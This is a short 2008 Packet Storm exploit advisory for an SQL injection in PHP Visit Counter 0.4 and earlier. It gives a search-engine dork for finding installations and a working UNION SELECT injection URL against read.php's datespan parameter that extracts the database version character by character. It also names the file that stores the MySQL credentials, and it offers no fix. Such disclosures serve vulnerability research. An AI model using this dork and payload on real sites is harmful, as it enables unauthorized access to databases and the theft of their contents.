phpvisitcounter-sql.txt

2008-05-31T00:00:00
ID PACKETSTORM:66865
Type packetstorm
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00

Description

                                        
                                            `###############################################################  
#  
# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability  
#   
# Vulnerability discovered by: Lidloses_Auge   
# Greetz to: -=Player=- , Suicide, g4ms3, enco,  
# GPM, Free-Hack, Ciphercrew, h4ck-y0u  
# Date: 30.05.2008  
#  
###############################################################  
#   
# Dork: inurl:"read.php?datespan="  
#  
# Vulnerability:  
#  
# 1.) SQL Injection  
#  
# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*  
#  
# Notes:  
#  
# Output is displayed as INT, so you've to convert it into ascii and  
# scan every single letter to get the whole name.  
# MySQL Data is stored in [Counterpath]/variables.php  
#  
###############################################################  
  
`